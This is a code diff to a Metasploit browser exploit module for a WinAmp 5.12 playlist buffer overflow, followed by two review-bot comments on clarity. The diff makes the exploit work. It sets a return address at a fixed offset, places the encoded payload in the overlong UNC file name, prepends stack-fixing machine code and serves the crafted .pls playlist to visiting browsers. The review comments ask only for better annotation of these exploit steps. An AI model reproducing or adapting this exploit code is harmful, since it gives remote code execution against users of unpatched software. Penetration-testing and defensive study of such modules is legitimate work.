diff --git a/modules/exploits/windows/browser/winamp_playlist_unc.rb b/modules/exploits/windows/browser/winamp_playlist_unc.rb
index 3584fd377a..11c8f5fb43 100644
--- a/modules/exploits/windows/browser/winamp_playlist_unc.rb
+++ b/modules/exploits/windows/browser/winamp_playlist_unc.rb
@@ -26,7 +26,7 @@ class Exploits::Windows::Browser::WinAmp_Playlist_UNC < Msf::Exploit::Remote
 				],
 			'DefaultOptions' =>
 				{
-					'EXITFUNC' => 'thread',
+					'EXITFUNC' => 'process',
 				},
 			'Payload'        =>
 				{
@@ -36,11 +36,19 @@ class Exploits::Windows::Browser::WinAmp_Playlist_UNC < Msf::Exploit::Remote
 						{
 							'ConnectionType' => '-find',
 						},
+
+					# Landing on \x5c\x5c trashes esp, restore from ecx
+					'PrependEncoder' => "\x87\xe1",
+
+					# Dont need them, dont want them, preserve esi
+					'DisableNops' => true,
+
 				},
 			'Platform'       => 'win',
 			'Targets'        =>
 				[
-					[ 'WinAmp 5.12', { }],
+					# Return to exe, but don't clobber ecx, 0x0d is replaced by 0x00
+					[ 'WinAmp 5.12', { 'Ret' => 0x0d45fece }],
 				],
 			'DisclosureDate' => 'Jan 29 2006',
 			'DefaultTarget'  => 0))
@@ -54,10 +62,12 @@ class Exploits::Windows::Browser::WinAmp_Playlist_UNC < Msf::Exploit::Remote
 		if (not request.uri.match(/\.pls$/i))
 			html =
-				"" +
-				"One second please..." +
+				"One second please..."
 			send_response(cli, html)
 			return
 		end
@@ -73,11 +83,15 @@ class Exploits::Windows::Browser::WinAmp_Playlist_UNC < Msf::Exploit::Remote
 	def generate_playlist(payload)
 
-		file = Rex::Text.pattern_create(2048)
+		name = "The Metasploit(TM) Theme Song"
+		file = Rex::Text.rand_text_english(1026)
+		file[1022 , 4] = [target.ret].pack('V')
+		file[0, payload.encoded.length] = payload.encoded
 
 		play = "[playlist]\r\n" +
-			"File1=\\\\" + file + "\r\n" +
-			"Title1=~BOF~\r\n" +
+			"File1=\\\\#{file}\r\n" +
+			"Title1=#{name}\r\n" +
 			"Length1=FFF\r\n" +
 			"NumberOfEntries=1\r\n" +
 			"Version=2\r\n"
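Review bot: The EXITFUNC change from 'thread' to 'process' in the first hunk carries no comment and the page shows no commit message explaining it, so a later reader cannot tell whether the thread exit was found to be unreliable for this host or whether this is a preference, and the line is likely to be reverted by someone "restoring the default". A trailing comment on the new line would settle it, e.g. `'EXITFUNC' => 'process', # <why a thread exit is unsuitable for this target>` with the placeholder replaced by the actual reason. The enclosing update_info hash starts before this hunk and is closed in a later one.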
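Review bot: The PrependEncoder value `"\x87\xe1"` in the second hunk is a raw machine-code literal whose comment states the intent but not the instruction, so a reviewer cannot check that the bytes do what the comment claims without disassembling them; put the mnemonic in the comment, e.g. `# xchg esp, ecx -- landing on \x5c\x5c trashes esp, restore it from ecx`. The comment on the new 'Ret' entry, `0x0d is replaced by 0x00`, should name what performs the replacement (presumably the playlist parser on the target, which nothing in the hunk shows) so the constraint this places on the address is understood by whoever next changes it. Minor: `Dont` appears twice and should be `Don't`. The surrounding update_info hash opens before this hunk.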